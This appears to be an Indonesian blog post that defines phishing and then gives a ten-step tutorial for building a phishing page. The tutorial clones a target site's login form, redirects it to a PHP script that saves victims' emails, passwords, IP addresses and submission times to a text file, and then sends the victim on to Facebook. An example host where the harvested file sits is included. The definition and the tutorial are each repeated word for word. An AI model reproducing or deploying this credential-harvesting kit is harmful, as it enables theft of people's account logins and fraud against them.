Apa itu phishing?
Di bidang keamanan komputer, phishing adalah proses pidana penipuan yang mencoba untuk mendapatkan informasi sensitif seperti username, password dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau administrator IT biasanya digunakan untuk memikat publik tidak curiga. Phishing biasanya dilakukan melalui e-mail atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian di sebuah website palsu yang tampilan dan nuansa yang hampir sama dengan yang sah. Phishing adalah contoh dari teknik rekayasa sosial yang digunakan untuk mengelabui pengguna, dan mengeksploitasi kegunaan miskin teknologi keamanan web saat ini. Upaya untuk menangani meningkatnya jumlah melaporkan phishing insiden termasuk legislasi, pelatihan pengguna, kesadaran masyarakat, dan langkah-langkah keamanan teknis.
Di bidang keamanan komputer, phishing adalah proses pidana penipuan yang mencoba untuk mendapatkan informasi sensitif seperti username, password dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau administrator IT biasanya digunakan untuk memikat publik tidak curiga. Phishing biasanya dilakukan melalui e-mail atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian di sebuah website palsu yang tampilan dan nuansa yang hampir sama dengan yang sah. Phishing adalah contoh dari teknik rekayasa sosial yang digunakan untuk mengelabui pengguna, dan mengeksploitasi kegunaan miskin teknologi keamanan web saat ini. Upaya untuk menangani meningkatnya jumlah melaporkan phishing insiden termasuk legislasi, pelatihan pengguna, kesadaran masyarakat, dan langkah-langkah keamanan teknis.
Berikut Adalah Cara Membuat Phising :
1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.html
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:
<form method="POST" action="RANDOM URL" name="menubar_login" id="menubar_login">
4. ganti url "RANDOM URL" jadi write.php kalau punya gw artrief.php
5. save
6. bikin "write.php"
Code:
<?php
$file = "hasil.txt";$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"http://www.facebook.com/home.php?ref=home\";// -->
</script>";
?>
7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama ...
10. buat file txt dengan nama hasil.txt
contoh:
wolfering[dot]multimediaroom[dot]tk
hasilnya di: wolfering[dot]multimediaroom[dot]tk/hasil.txt
Sekian Lah Cara Membuat Phising
1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.html
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:
<form method="POST" action="RANDOM URL" name="menubar_login" id="menubar_login">
4. ganti url "RANDOM URL" jadi write.php kalau punya gw artrief.php
5. save
6. bikin "write.php"
Code:
<?php
$file = "hasil.txt";$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"http://www.facebook.com/home.php?ref=home\";// -->
</script>";
?>
7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama ...
10. buat file txt dengan nama hasil.txt
contoh:
wolfering[dot]multimediaroom[dot]tk
hasilnya di: wolfering[dot]multimediaroom[dot]tk/hasil.txt
Sekian Lah Cara Membuat Phising
0 komentar:
Posting Komentar